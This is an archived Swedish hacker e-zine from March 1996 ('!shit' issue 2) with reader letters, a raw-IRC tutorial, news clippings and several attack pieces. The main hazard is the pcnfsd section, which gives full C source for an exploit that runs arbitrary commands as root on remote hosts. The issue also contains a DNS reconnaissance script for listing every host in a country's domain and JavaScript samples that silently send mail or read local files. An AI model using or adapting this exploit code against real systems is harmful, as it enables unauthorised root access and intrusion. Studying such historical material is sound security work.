OBS! Denna textfil ingår i ett arkiv som är dedikerat att bevara svensk undergroundkultur, med målsättningen att vara så heltäckande som möjligt. Flashback kan inte garantera att innehållet är korrekt, användbart eller baserat på fakta, och är inte heller ansvariga för eventuella skador som uppstår från användning av informationen.
#!/bin/more
____
/ \ ____ __ ____
\ /______/_ /_ ___/ /_
\ / _ / \ / _/
\/ __ \_/ __ / / /
Nummer #2 (hse/a) / \ \ \ /__/__/__/ Mars 1996
\__/_______/ desejerunte?
No idle, no gain
BRAINSTORM
Words, words, words 1.0
MAIL
Vi drar några lyckliga vinnare 2.0
från månadens postsäck
IRC
IRC utan skyddsnät: Raw-IRC Dead Socket 3.0
HACK
Bug i pcnfsd låter dig exekvera Shellshock 4.0
kommandon som root
Äntligen är den här, DNScan 1.0 Shellshock 4.1
WWW
Kreativ Java-kodning htXs 5.0
NYTT 6.0
Etisk storstädning på internet 6.1
Epost som att skicka hemlighet med vykort 6.2
Osäkert låta konsult sköta Malmöpolisens datahantering 6.3
Sex och politik bannlyst 6.4
Slutet för de elektroniska klotterplanken 6.5
Netscapes kryptering bruten på nytt-med gammal metod 6.6
Storebror fumlar med lagböckerna 6.7
HD lät datakopierare behålla utrustning 6.8
Lucka i lagen skyddar piratkopior 6.9
SURF
Är Mitnick en überhacker eller en htXs 7.0
luser, avgör själv
MISC
Riksspolisstyrelsen på Internet Broken Pipe 8.0
En sysadmins samvete CB 8.1
-----------------------------------------------------------------------
Ord går ut till besättningen på #hack.se för hjälp med distributionen
-----------------------------------------------------------------------
(C)opyright?
/* -------------------------------------------------------------
All information i !shit publiceras endast i studiesyfte
och som underhållning.
Artikelförfattarna i !shit är inga förebilder. De är inte ens
mänskliga. De är hackers. Vissa saker de gör kan få en
person skadad, relegerad, arresterad, möjligtvis utvisad.
För att uttrycka det hela på ett annat sätt:
Don't try this at home.
------------------------------------------------------------- */
___ ___ __ __ __ _ __ ____ ___ ___ _ __
___ | _)| )/ | | \ |( _|_ _) _ \ ) V | _____________________________
1.0 |____)_)_\_|_|__|_\__|___)|__|\___/_)_\_v__|
Sedan den förra och första filen vi så gärna kallar !shit träffade gatorna har
jag börjat dra mig för att visa mig på irc. Jag kan förstå att våra texter
fungerar som ett livselexir för vissa, men ingen kan vara så beroende av detta
alster att det berättigar att fråga mig *varje* dag när nästa nummer kommer.
Artiklar kommer in löpande, och nya nummer kommer att släppas så fort det
finns tillräckligt med material för att rättfärdiga det. Alltså kommer varje
release sporadiskt, och jag varken vill eller kan veta när det blir. Så,
det tjänar inget till att *tjata*. Ok?
Detta är inte ett angrepp på *alla* som frågat hur det går med #2, tvärt om
är det givetvis trevligt att veta att det finns en efterfrågan på det vi gör.
Bara det finns måtta. Hoppas vi lyckats leva upp till förväntningarna.
Kanske inte som en blixt från klar himmel har det uppstått en hel del ideer
om hur !shit skall uttalas. Om dessa ideer faktiskt är missförstånd låter
jag vara osagt eftersom det tvivellöst inte finns en absolut sanning i denna
vetenskap. Men som en spark i rätt riktning för den skara som inte alls kan
ta till sig betydelsen av utropstecknet i namnet, vill jag citera manfilen
för bourne-shell: "! Unary negation operator". Nog om detta.
Låt artiklarna och synpunkterna fortsätta flöda till: noshit@alpha.c2.org
__ __ __ __ _
___ | V |/ | | |_ _______________________________________________________
2.0 |__v__|_|_|__|___| från /usr/lib/snedmail
Tyvärr kan vi av utrymmesskäl inte ta med alla brev som vi fått, men vi
uppskattar dem inte mindre för det. Forsätt skriva! Här kommer några smakprov
som ganska bra representerar majoriteten av vår brevskörd.
Date: Thu, 04 Jan 96 19:14:00 +0200
From: Phoo
Subject: tack... snällt..
Tack så mkt för att du gjort mig känd i ditt "fina" zine !SHIT...
mkt trevligt.. nu kommer jag förmodligen bli tvungen att byta nick..
fan ta dig.. :(
annars så dög !shit nästan... kommer det fler nummer eller?
vart kommer man få tag i skiten? lägg upp det på nån ftp...
|| -Phoo- of AiP
\__/
* SLMR 2.1a *
-------------------------
Date: Fri, 05 Jan 96 16:19:00 +0200
From: SPiFf
Subject: Lama..
Hohoooo... Jag läste just "din" tidning !shit, vilket faktiskt
sammanfattar den rätt bra... Shit.. Fukk, den suger kuk.. Kan du inte
göra en bättre tidning så gör ingen alls.. Du verkar tro att man är
ELiTe för att man använder lite freakiga versaler/gemener.. Jag är fan
säker på att du inte ens är nån pirater ö.h.t. Du är bara en liten Lama
som sitter och skriver mesiga små E-ZiNes...
Elite Commandments:
-------------------
1] Never admit you have no idea what
you're talking about.
(Den tar du bokstavligt)
2] Never have a good word to say about
anyone else but yourself.
(Wow.. Den följer du också)
3] Join every group that will let you
join. After a few weeks have passed,
quit & claim they aren't good enough
to merit your prescence.
(Hee.. Pook..)
4] Always shift the blame to someone
else. "It's not my fault" should
become 2nd nature to you.
(Humm....)
5] Always have nasty things to say
about your so called friends behind
their backs.
6] Hate as many people as possible.
(Du har vänt på den, "få så många som möjligt att hata dig")
7] Start as many rag wars as humanly
possible. When your up against
intelligent people (As on Adventurers
Tavern, 1982-1986. RIP), and losing
your end of the war. Say "This is
stupid and childish, even if I did
start it", and stop posting.
8] When someone becomes pushy and openly
challenges your lack of knowledge
about something. Say "I know the
answer, but you're not elite enough,
so I can't tell you".
(Haha.. rätt i prick)
9] If anyone still dares to question you
then threaten them with tough things
like getting someone to turn their
phones off, or charge 10 billion
toilets on their mothers credit card.
(It doesn't matter whether or not you
actually know how to do this, or know
anyone else who will do it for you.
This is a favorite tactic of ELITE!@
phreak groups like L0D!!@#1!.) If all
else fails began chanting "Cable
throw, Cable throw, Cable throw" or
if you are a pirate: make a fright-
ening rag page on them in your next
Copya crack.
[Warning: Be sure to only use this on a
fellow ELITE!@#1! phreak, pirate or
equivalent ignorant person. Anyone else
will laugh at you & tell you to fuck
off. Only adding to the questioning
of your massive eliteness.]
10] Make as big a fool of yourself as
is possible. Display your ignorance
and stupidity in a manner that will
make itself noticible to the modem
community at large. If you are a
aspiring elite pirate, get your
name on as many copya cracks as
fast as possible. Or if you are a
up and coming elite phreak, start
up your own little world (or join
someone else who has already done
this, such as LOD), refuse to see
anyones viewpoint but your own, &
declare yourselves mega-elite.
Följer du bara dom här reglerna eller? Fukk.. Och sen, när du börjar ta
pHOo som exempel på en lama, så är du ganska långt ute i skogen. Har du
inte hört talas om pHOo så vet jag fan inte var du har varit de
närmaste månaderna.. Under en sten? =)
En sak till; på din lilla SuRf lista (Vem fan använder ordet surfa
ändå? Låter som aftonbladet "Så här surfar du på nätet..") Duh..
Iaf, inte en enda FTP fanns med, alla kanske inte gillar att sitta och
se en massa fina bilder och menyer som på WWW, jag förstår att
W95-luserz som du kanske gillar det, men de flesta vill ha FTPs när man
ska ladda hem prylar.. Ut och smurfa med dig...
Jaja, fortsätt knapra på dina små floppiez och skriv din ZiNe, men tro
inte att nån bryr sig... Iaf inte jag, the almighty SPiFf... =)
Fuck ELiTe, go ShareWare... NOT NOT NOT NOT NOT NOT!!!!!! =)
/EL SPiFf of AiP Rokxz da funkie Joint....
* SLMR 2.1a *
__ ___ ___
___ | | ) __) _____________________________________________________________
3.0 |__|_)_\___) Raw-IRC, av Dead Socket
Du har precis hackat ns.tip.net och känner att du behöver besöka #hack.se
för att skryta med din erövring. Men det finns givetvis ingen irc-klient på
ns.tip.net. Vad gör du nu?
Min rekommendation är att du kollar i Gula Sidorna under P för psykolog. Inte
i helvete är du väl så dum att du använder ns.tip.net för att irca? Kom igen!
Allvarligt talat, så är protokollet mellan klient och server baserat på
kommandon som skickas i klartext, och det hela är mycket enkelt och raktfram.
Att hoppa över klienten och ansluta sig direkt till servern kallas ibland för
raw-irc. Det är inte svårare än en telnet till din favoritserver på port 6667
och att följa dessa enkla instruktioner.
beavis> telnet irc.nada.kth.se 6667
Trying 130.237.226.10...
Connected to mumrik.nada.kth.se.
Escape character is '^]'.
Det första som händer när du kopplar upp dig mot port 6667 är att irc-servern
förväntar sig viss information om dig. Börja med att skriva;
NICK IvilHaxor
...eller vilken nick du nu vill använda. Därefter måste du ange ditt konto,
host- och servername, samt ditt "riktiga" namn. Fälten för hostname och
servername ignoreras, så där kan du skriva vad som helst. Syntaxen är:
USER ivilhax hostname servername :Da iViL 0nE
Om nicken inte är upptagen så kommer du att se ditt välkomstmeddelande som
indikerar att du är inne. Nu kan du använda alla dina vanliga kommandon typ
JOIN, PART, MODE, osv.
JOIN #hack.se
:ivil!~ivil@enemy.public.se JOIN :#hack.se
:irc.nada.kth.se 353 ivil @ #hack.se :ivil @shshock @TheK @blur @Chaoz tcm @E-114 chaotic @acdhead @thk psyched
:irc.nada.kth.se 366 ivil #hack.se :End of /NAMES list.
Det som är annorlunda är hur du skriver till en channel eller skickar msg's.
Båda delarna gör du med PRIVMSG enligt följande:
PRIVMSG #hack.se :w0rdawp, wassup?
PRIVMSG shshock :n4r k0mm3r !shit #2, d00d?
Om du är inaktiv kommer du att få upp ett PING-meddelande. Typ:
PING :irc.nada.kth.se
Det måste du svara på, annars kommer du att bli nedkopplad. Skriv:
PONG :irc.nada.kth.se
Svårare än så är det inte. Om du vill ha mer information om irc-protokollet
så finns det beskrivet i RFC1459.
_ __ __ ___ _ __
___ | L |/ | _| / / _______________________________________________________
4.0 |_||_|_|_|___|_|_\
Avalon Security Research
Release 1996.1
(pcnfsd)
Affected Program: rpc.pcnfsd
Tested Operating Systems: SunOS 4.1.X, Linux
Affect: Remote attackers may execute an arbitrary command as root on
the target machine.
Bug Synopsis:
rpc.pcnfsd's run_ps630 function does not correctly validate it's
arguments. This allows us to trick rpc.pcnfsd into running a command
other than ps630.
Fix:
The the run_ps630 function does not seem to be needed. Removing
the only call to it in pr_start (pcnfsd_print.c) should remove this
vulnerability.
Exploit Information:
Exploit code will be posted to the ASR mailing list exactly one week
from the release of this advisory.
Notes:
Although the rpc.pcnfsd bundled in all Linux distributions is
vulnerable. Is appears to be exceedingly difficult to exploit this
vulnerability under Linux. ASR welcomes and appreciates information
on the action of this vulnerability in other operating systems.
Sedan denna advisory släpptes har det gjorts fler tester, och buggen verkar
inte vara möjlig att utnyttja under Linux. Dock har vi kunnat bekräfta att
SunOS 4.x, Irix och BSDI är sårbara.
Ta hem sourcen till pcnfsd från bcm.tmc.edu:/pcnfs/pcnfsd.93.02.16.tar.Z och
kompilera nedanstående program för att testa om din pcnfsd är sårbar. Om du
har möjlighet att göra tester under något annat OS än ovan nämnda så är vi
mycket intresserade av resultatet. Skicka info till shshock@alpha.c2.org.
-----------------8<-- klipp här -----------------------------------------------
/* slugger2.c
* By Josh D. November 1st 1995 AD
* rewritten January 31st 1996 AD
* compile w/ pcnfsd_clnt + pcnfsd_xdr + rpcsvc
* usage: slug2 target 'command'
* where:
* slug2 is this program.
* target is the target host
* 'command' is a bourne shell command within single quotes *and*
* with the slash chr ('/') substituted with the A environment
* variable: e.g. 'touch ${A}filename' would equate to
* 'touch /filename'.
* caveat:
* The command is limited to 27 charactars.
* Using shell meta-charactars (!#$^&*()<>[] etc etc) in your command
* will cause the exploit to fail.
* If rpc.pcnfsd was started from the rc scripts (as opposed to inetd)
* which it usually is: it will die after one succesful run of this
* program.
* The rpc calls this code makes always fail and print the error code:
* '137' <<---- See 'wierd ass error' below.
* This code always times out ont it's pr_start call because rpc.pcnfsd
* dies before it gets a chance to reply. This fix for this is
* to make to timeout value very small for the pr_start call.
*
* **********************************************************************
*
* This code is provided for educational purposes only.
* Neither Josh D. nor ASR take any responsibility for the use
* or misuse of this code.
*
*/
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <errno.h>
#include <arpa/inet.h>
#include <string.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <netinet/in.h>
#include "pcnfsd.h" /* this should be created by rpcgen */
int main(argc, argv)
int argc;
char **argv;
{
char myhost[200];
int gids[8];
struct hostent *dahent;
struct sockaddr_in daserver;
CLIENT *datsme;
struct pr_init_args daargs;
struct pr_init_res *dares;
struct pr_start_args fags;
struct pr_start_res *figs;
char daprinter[65];
char dadir[65];
char dapath[255];
struct timeval tout;
int ranysock=RPC_ANYSOCK;
tout.tv_sec=60;
tout.tv_usec=0;
if (argv[3] != NULL && argv[4] != NULL)
{ printf("bad arguments\n");
exit(1);
}
if (strlen(argv[2]) > 27)
{ printf("command must be less than 27 chars\n");
exit(1);
}
/* this must be a valid printer */
strcpy(daprinter, "lp");
daserver.sin_family = AF_INET;
daserver.sin_port = 0;
dahent = gethostbyname(argv[1]);
if (dahent == NULL)
{ printf("gethost failed.\n");
exit(1);
}
bcopy(dahent->h_addr, &daserver.sin_addr.s_addr, 4);
datsme = clntudp_create(&daserver, 150001, 1,
tout, &ranysock);
clnt_control(datsme, CLSET_TIMEOUT, &tout);
gids[0]=0;
gids[1]=1;
datsme->cl_auth = authunix_create(myhost, 0, 0, 2, gids);
sprintf(dapath, "..${A:=$HOME}..$A..${A}bin${A}sh -c \"%s\" ", argv[2]);
daargs.pia_client = dapath;
daargs.pia_printername = daprinter;
/* Wierd ass error:
whenever we pub '"' in a string for pr_init/pr_start rpcsvc
seems to break.
This doesn't imapir the effects of the exploit, it simply
doesn't allow us to see any errors pcnfsd returns. I don't
plan on fixing this. */
/* simple minds.... */
if ( (dares = pcnfsd_pr_init_1(&daargs, datsme)) == NULL)
{ printf("137\n"); }
else
{ if (dares->pir_stat == PI_RES_OK)
printf("Success\n");
if (dares->pir_stat != PI_RES_OK)
{ printf("Error: ");
switch(dares->pir_stat)
{
case PI_RES_NO_SUCH_PRINTER :
printf("No such printer\n");
break;
case PI_RES_OK :
printf("Result Ok\?\?\n");
break;
case PI_RES_FAIL :
printf("Generic Failure\n");
break;
default :
printf("Unknown Error\n");
}
}
}
fags.psa_client = ".";
fags.psa_printername = daprinter;
fags.psa_username = "root";
fags.psa_filename = dapath;
fags.psa_options = (argv[3] == NULL) ? "d ;> " : "d ;< ";
/* simple pleasures */
figs = pcnfsd_pr_start_1(&fags, datsme);
if (figs == NULL)
{ printf("137\n");
exit(1);
}
}
-----------------8<-- klipp här -----------------------------------------------
4.1
Universalverktyget för domänfrågor
DNScan
För ett tag sedan så ville jag lista alla burkar med DNS-entries för ett helt
land, och insåg att det inte lät sig göras enkelt. Så jag hackade ihop en
liten utility för det, och gav den till några kompisar på #hack.se och bad
att de inte skulle sprida den vidare tills det att jag hade en färdig och
bugtestad version klar.
Mindre än en vecka senare började jag få mail från ställen så långt bort som
Malaysia som tackade för att jag skrivit ett sådant användbart verktyg.
Hmm...
Tyngd av ansvaret att folk faktiskt använder mitt lilla script har jag nu
fixat de buggar som fanns och fått fram en version 1.0 som jag vågar stå för.
Håll till godo.
-----------------8<-- klipp här -----------------------------------------------
#!/bin/sh
#
# DNScan 1.0 by Shellshock (shshock@alpha.c2.org)
#
# Directory for temporary files
TMPDIR=.
# Name of lockfile for -file mode
LOCKFILE=$TMPDIR/dnscan.lock
# Set default parameters to nslookup, 2 retries with a timeout of 10 secs
PARAMS="-retry=2 -timeout=10"
# Print usage information
usage()
{
more << end-of-text
Usage: dnscan [-quiet] [-file <filename>] [-domain <domain>] [-sub <subdomain>]
-quiet Useful when piping to a file while running in the background.
-file Use <filename> as a list of subdomains and servers to scan.
-domain List all servers in a first level domain like .uk or .no.
-subdomain List all servers in a subdomain.
DNScan usually generates alot of output, so you probably want to pipe the
output to a file. Some messages will still be sent to you terminal to keep
you informed of whats going on, unless you use -quiet.
The -domain mode will first create a file called 'domain.<domain>' with a
list of all subdomains and their name servers, and then use that file in
the -file mode. It will not work with the com, edu, mil, gov, net or org
domains, because there is no single name server that will list these.
If you want to create your own file to run in the -file mode, each line of the
input file needs to have the following format:
<domain> <subdomain> [<dns>]
* To list all servers in Japan, do "dnscan -domain jp".
* To list all servers in the netcom domain, do "dnscan -sub netcom.com".
* To find Sun boxes at swipnet, do "dnscan -sub swip.net | grep -i sun".
I've found that sometimes nslookup hangs on a query. Just find nslookup with
ps and kill it, and the scan will continue with the next subdomain.
end-of-text
}
### Strip away all unwanted lines from the output of the 'ls -d', that is:
### - all server names ending with a dot, they are probably in another domain
### - all references to localhost (127.0.0.1)
### - all lines not of the type A or HINFO
clean_serverlist()
{
sed -n " {
/^.*\. /d
/127.0.0.1$/d
/ A /s/^ /$SUBDOMAIN /p
/ HINFO /s/^ /$SUBDOMAIN /p
} " | sort -u
}
### List the name servers handling the selected subdomain
list_subdomain_dns()
{
echo "$SUBDOMAIN" | nslookup -querytype=ns $PARAMS |\
sed -n 's/.*nameserver = //p'
}
### Print a formated list of servers (recordtypes A and HINFO) in a subdomain
### If we don't already have selected a name server, take the first in the
### list from list_subdomain_dns, or even better use one that is actually
### within the subdomain
list_subdomain()
{
if [ -z "$DNS" ]; then
DNS=`list_subdomain_dns | grep -i $SUBDOMAIN\$ | sed -n 1p`
[ $DNS ] || DNS=`list_subdomain_dns | sed -n 1p`
[ $QUIET ] || echo "Using name server $DNS for *.$SUBDOMAIN" >&2
fi
echo "ls -d $SUBDOMAIN" | nslookup $PARAMS - $DNS | clean_serverlist
}
### Scan all subdomains listed in a file
from_file()
{
while read domain subdomain DNS; do
[ $domain ] || continue
SUBDOMAIN=$subdomain.$domain
# If POS is set, we are continuing an interrupted scan
if [ $POS ]; then
[ $SUBDOMAIN != $POS ] && continue
unset POS
fi
[ $QUIET ] || echo "Scanning $SUBDOMAIN" >&2
# Write infile and subdomain to a lockfile, so that we
# later can continue the scan if we get interrupted
echo "$INFILE $SUBDOMAIN" > $LOCKFILE
list_subdomain
echo
done < $INFILE
}
### Strip away all but the NS lines from the output of the 'ls -d' and sort
### Also filter server names ending with a dot, and prepend the domain name
### first on each line
clean_dnslist()
{
sed -n " {
/^.*\. /d
s/^ /$DOMAIN /
s/ NS / /p
} " | sort -u +1 -2
}
### List all the name servers handling the selected domain
list_domain_dns()
{
( echo root; echo "$DOMAIN." ) |\
nslookup $PARAMS -querytype=ns -domain=$DOMAIN |\
sed -n 's/.*nameserver = //p'
}
### List all name servers in the selected domain
list_domain()
{
DOMAINFILE=domain.$DOMAIN
# Use first name server in the list for the domain
domain_dns=`list_domain_dns | sed -n 1p`
[ $QUIET ] || echo "Using name server $domain_dns for *.$DOMAIN" >&2
# Create a file with all subdomains and their name servers, and then
# switch to -file mode
echo "ls -d $DOMAIN" | nslookup $PARAMS - $domain_dns |\
clean_dnslist > $DOMAINFILE
MODE=file
INFILE=$DOMAINFILE
from_file
}
### Parse flags
unset QUIET
while [ -n "$1" ]; do
case "$1" in
-quiet) QUIET=true
;;
-file) MODE=file
INFILE=$2
shift
;;
-domain) MODE=domain
DOMAIN=`echo $2 | sed 's/^\.//'`
shift
;;
-sub) MODE=subdomain
SUBDOMAIN=`echo $2 | sed 's/^\.//'`
shift
;;
*) usage
exit
;;
esac
shift
done
### Look for previously interrupted scan
if [ -f $LOCKFILE ]; then
echo "Continue previously interrupted scan [n]? \c" >&2
read r
if [ `echo x$r | grep -i "^xy"` ]; then
read INFILE POS < $LOCKFILE
[ $POS ] && MODE=file
fi
[ $QUIET ] || echo >&2
fi
### Present ourself
[ $QUIET ] || ( echo "DNScan 1.0 by Shellshock"; echo ) >&2
### Select mode
case $MODE in
file) from_file
;;
domain) list_domain
;;
subdomain) list_subdomain
;;
*) usage
exit
;;
esac
### Clean up the temporary file we have created
rm $LOCKFILE 2>/dev/null
__ __ __ __
___ \ \/\/ /\/\/ /\/\/ / _____________________________________________________
5.0 \_/\_/\_/\_/\_/\_/ Kreativ Java-kodning, av htXs
Debatten om vad någon med ont uppsåt kan ställa till med, med hjälp av Java
är i full gång. Redan finns det ett par ganska skrämmande (eller upplyftande,
beroende på vem man är) förslag:
Ta följande lilla script till exempel.
<body onload="document.mailme.submit()">
<form method=post name=mailme
action="mailto:noshit@alpha.c2.org?subject=n4r k0mmer numm3r 2?">
<input type=hidden name="noshit" value="bullshit">
</form>
<img src=/pics/bigones.gif>
</body>
När du tror att du endast tittar på en helt oskyldig sida med en GIF-bild på,
så skickas i själva verket ett mail till noshit@alpha.c2.org, i *ditt* namn,
i ögonblicket som du öppnar sidan.
http://www.popco.com/grabtest.html
Eller vad sägs om ett script som gömmer sig i bakgrunden, och varje gång du
går till en ny URL så rapporteras det tillbaka till servern där du "plockade
upp" det elaka scriptet?
http://www.osf.org/~loverso/javascript/track-me.html
Det tredje och kanske värsta exemplet är ett script som listar ett bibliotek
eller en fil på din hårddisk, och skickar iväg resultatet. Om du skulle
starta Netscape som root innebär att din /etc/shadow helt plötsligt kan
plockas från din dator, utan att du märker det!
http://www.osf.org/~loverso/javascript/dir.html
Brendan Eich från Netscape lovade (inofficiellt) följande 29/2 för att
lösa ovanstående säkerhetsproblemen med Java:
"We're fixing directory listing and mail spamming, plus adding a Preference
to disable JavaScript, in a special 2.01 release that's about to supercede
2.0. Also in the Gold release, and (of course) in the "next release"
(3.0b1, I believe)."
Hmm...
__ _ _ _ ____ __
___ | \ | ) |_ _) ) _______________________________________________________
6.0 |_\__|_ |__|__| Nyhetsklipp från januari och februari
(___/
---------------------------------------------------------------------------
6.1 Dagens Industri, 951230 Etisk storstädning på internet
---------------------------------------------------------------------------
Det finns mycket skräp på det internationella datanätet
internet. Lika illa är det med de speciella databaser som går
under beteckningen BBS, elektroniska anslagstavlor. Information
som snarast är desinformation presenteras som om de vore nyttiga
nyheter. Men nu är det dags för etiska spelregler.
Det ska bli slut på den elektroniska miljöföroreningen - de
svenska IT-företagens branschorganisation Sito går till attack
och uppmanar sina medlemmar att stoppa oetisk information. Jag
tror att branschen kan sanera sig själv, säger Hans Iwan Bratt,
VD för Sito i Stockholm.
Med våra nya regler om ansvar för elektronisk information skapar
vi något som närmast liknar de pressetiska reglerna. Det vore
olyckligt med stelbent lagstiftning, en lagstiftning som ändå
inte skulle ge effekt.
Hotas med uteslutning
Sitos medlemsföretag blir skyldiga att följa de stundande etiska
affärsreglerna för elektronisk information. Den som bryter mot
dem utesluts ur branschorganisationen.
Hans Iwan Bratt anser att de stora problemen med skräpinformation
handlar om dålig och föråldrad information. Det förekommer också
obehagliga förföljelser mot privatpersoner och folkgrupper på
såväl internet som på vissa BBS-adresser. Däremot tycker Hans
Iwan Bratt att spridningen av barnpornografi fått allt för stor
publicitet: Det är ett ytterst litet problem med få aktörer och få
intresserade. Personförföljelser och sabotage av olika slag är
betydligt allvarligare för internets rykte.
Ett vanligt sabotage är så kallad bombning: en misshaglig person
eller aktör på internet får så mycket elektronisk post att
dennes elektroniska brevlåda kollapsar. Resultatet blir ofta att
personen eller operatören får stänga sin anslutning till
internet. I USA har t ex militanta kvinnogrupper bombat
internetsidor som visar porr- och fotomodeller.
Risk för peststämpel
Enligt Hans Iwan Bratt löper internet stor risk att få samma
peststämpel som 071-numren fick för några år sedan. Det hotar
den kommande kommersiella utvecklingen av internet och därför
reagerar branschen.
Svag organisation
Sito hette tidigare LKD och samlar 250 medlemsföretag med en
total omsättning på 100 miljarder kronor - 90 procent av
branschens totalomsättning. Ändå anses Sito vara en relativt
svag branschorganisation; flertalet IT-företag är småföretag som
inte är med men som ändå agerar på internet eller BBS. Det är
dessutom i praktiken omöjligt att förbjuda information på
internet utan att kapa förbindelserna med omvärlden. Förbjuds
tex starkölsreklam på internet i Sverige så kan informations-
lämnaren flytta till utlandet med några enkla handgrepp vid
datorn.
---------------------------------------------------------------------------
6.2 TT, 960123 Epost som att skicka hemlighet med vykort
---------------------------------------------------------------------------
Datasäkerheten på svenska företag och myndigheter är ofta
skrämmande dålig.
Sekretessbelagda uppgifter om privatpersoner, till exempel
sjukjournaler, straffregister och annat går i klarskrift över
internet. Hemlig företagsinformation sänds utan skydd.
-Det är som att skicka hemligheter med vykort, säger
dataexperten Tommy Pedersen.
Han har jobbat med datasäkerhet i sex år och börjar bli ganska
luttrad. Säkerhetsbristerna är ofta häpnadsväckande. På tisdagen
pratade han säkerhet på ett seminarium vid en fackmässa för tele-
kommunikationer på Svenska Mässan i Göteborg.
Där, på Telecom Scandinavia, var det de tekniska nymodigheterna
och alla spännande möjligheter de ger, som var huvudtemat. I
Tommy Pedersens värld finns även den mörka sidan av utvecklingen,
den som kan användas för industrispionage och som kan hota
människors personliga integritet. För den som vill leta är det
inga problem att till exempel sortera i epost-högarna på
internet.
Bara att ta fram
Speciella program hjälper snokaren att leta och tar bara fram
det han eller hon är intresserad av.
-Det är fritt fram för den som vill spionera, säger Pedersen.
Han arbetar för ett företag som heter Sectra AB i Linköping och
som levererar krypteringsutrustning för datakommunikation till
svenska försvaret. Där finns medvetenheten. På privata marknaden
och bland myndigheterna är vakenheten sämre.
-Datainspektionen borde få större resurser, framför allt när
det gäller tekniker, säger Tommy Pedersen. Han har sett strikt
privata, sekretessbelagda personuppgifter gå helt öppet på nätet.
Företag, som lägger stora summor på elektroniska övervaknings-
system, vaktutbildning och svårforcerade stängsel, skickar just
den företagsinformation man vill skydda utan minsta sekretess.
Som vykort, enligt Pedersen.
-Hade de legat i kuvert så hade man åtminstone haft det lilla
skyddet för hemligheterna.
Bristerna finns på alla nivåer, även hos stora svenska
multinationella företag. Sådana som borde veta bättre.
Inte dyrt att skydda
Tekniken för att kryptera och skydda informationen har funnits
länge och är heller, enligt Pedersen, inte speciellt dyr.
Problemet är snarare att få beslutsfattarna att förstå.
-Säkerhetscheferna på företagen har ofta sin bakgrund i vad man
kan kalla fysisk säkerhet. Kommunikationerna är teknikernas sak,
säger Pedersen.
I Sverige finns det en handfull företag som sysslar med
säkerhetsfrågor. I utlandet, till exempel Italien och England,
är branschen betydligt mer utbyggd. Antalet databrott har
tvingat fram medvetenheten.
---------------------------------------------------------------------------
6.3 TT, 960124 Osäkert låta konsult sköta Malmöpolisens datahantering
---------------------------------------------------------------------------
Rikspolisstyrelsen (RPS) har förbjudit länspolismästaren i Malmö,
Hans Wranghult, att låta en utomstående konsult ta hand om
myndighetens hela datahantering.
-En kovändning och dessutom inkonsekvent eftersom RPS också
använder konsulter, menar en besviken Wranghult.
Det handlar inte om kostnaden. I stället hänvisar RPS till
säkerhetsaspekten i beslutet att stoppa Malmöpolisens
konsultplaner.
Det som Malmöpolisen planerat kallas i datakretsar för
"outsourcing". Det innebär att hela dataverksamheten,
hanteringen av allt från spaningsuppgifter till bokföring,
skulle läggas ut på ett konsultföretag. Att göra det är enligt
RPS en mycket känslig fråga, och strax före årsskiftet förbjöd
man uttryckligen Malmöpolisen att fullfölja planerna, berättar
Sveriges Televisions Sydnytt. Hans Wranghult, som bland annat
utrett databrott och är RPS databrottsexpert, förvånas över
beslutet:
-Jag har planerat detta sedan hösten 1994 och naturligtvis
gjort säkerhetsbedömningar.
-I över ett år har RPS dessutom haft full insyn och fått
information om projektets fortskridande. Senast i september var
en representant från RPS på besök här, säger Wranghult till TT.
Under hela processen fram tills helt nyligen har länspolis-
mästaren varit övertygad om att konsultprojektet därför varit
förankrat och uppskattat hos RPS.
Stategisk betydelse
Det var RPS dataexpert Björn Lindqvist som besökte Malmö i
höstas. Hans bild är något annorlunda än Wranghults.
-Jag kan bara beklaga om Hans Wranghult fick intrycket att vi
var positiva till outsourcing. I själva verket föranleddes mitt
besök av att vi då helt nyligen insett omfattningen av Malmös
planer.
-Efter mitt Malmöbesök gjorde jag omedelbart en muntlig rapport
till rikspolisstyrelsens direktion.
-Wranghult borde ha insett att detta var en fråga av strategisk
betydelse, ett beslut som ytterst måste hamna hos rikspolischefen.
Lindqvist påpekar också att länspolisorganisationerna i
Stockholm och Göteborg klarar av att i huvudsak själva hålla i
sin datahantering.
-Det kan förekomma vissa konsultinsatser. Men total outsourcing,
som Malmö planerade, finns inte någonstans inom polisen, säger
han.
RPS uttryckliga förbud mot att använda ett utomstående företag
för drift, underhåll, och fortbildning inom datahanteringen,
tvingade Malmöpolisen att bryta samarbetet med det databolag
som då redan arbetat med en totalinventering av myndighetens
datahantering.
900 000 kronor är hittills nedplöjda i projektet.
-Men det är inte pengar som kastats i sjön. Den största
kostnaden ligger just på inventering och dokumentation, menar
Wranghult.
Efter kallduschen med RPS förbud har länspolismyndigheten i
Malmö också hunnit gå vidare i arbetet med att bygga upp den
egna kompetensen på området. Den gångna helgen annonserade man
exempelvis efter en datachef.
---------------------------------------------------------------------------
6.4 Svenska Dagbladet, 960206 Sex och politik bannlyst
---------------------------------------------------------------------------
Den allmänna ordningen måste upprätthållas. Det innebär att
kineserna får klara sig utan politik och sex på Internet. Den
kinesiska regeringen börjar bli orolig för att cyberrymden ska
förvrida huvudena på alla nätsurfare. Ministeriet för Post och
Tele ska se till att alla Internetanvändare registreras och att
alla kontakter med internationella datanät går via ministeriet,
enligt tidningen Financial Times.
Allt för att komma ifrån "ohälsosamma tendenser" i samhället.
Exempel på sådana tendenser är individer som sysslar med
statshemligheter och pornografiskt material - så kallad
barbarisk information.
Icke önskvärt
Hur ska då Kina få stopp på informationen som flödar på Internet.
Jo, genom att skapa en "Internet Light" där användarna har
obegränsad tillgång tillvarandras material men avskärmas från det
som inte är "önskvärt" från omvärlden. Kina går med i det nya
informationssamhället, men begränsar samtidigt tillgängligheten,
skriver tidningen Wall Street Journal. Än så länge använder bara
50 000 människor Internet i Kina. För vetenskapsmän är nätet en
guldgruva eftersom informationen är gratis.
Explosiv brygd
Den kinesiska regeringen fruktar främst politisk opposition och
pornografi. Dissidenter som skickar information via nätet till
sympatisörer i Kina ärinte populära.
Regeringens "Internet Light" innebär att de kinesiska användarna
kan skapaegna hemsidor, byta information med varandra, använda
databaser och besökade hemsidor som accepteras av regimen. Övriga
delar av Internet görs otillgängliga med hjälp av ett mjukvaru-
program från det amerikanska företaget Sun Microsystems.
Kineserna erkänner att en hacker kan ta sig igenom. Men det är
både svårt och riskfyllt att bryta mot reglerna.
Sex och politik är tydligen en explosiv brygd i Kina.
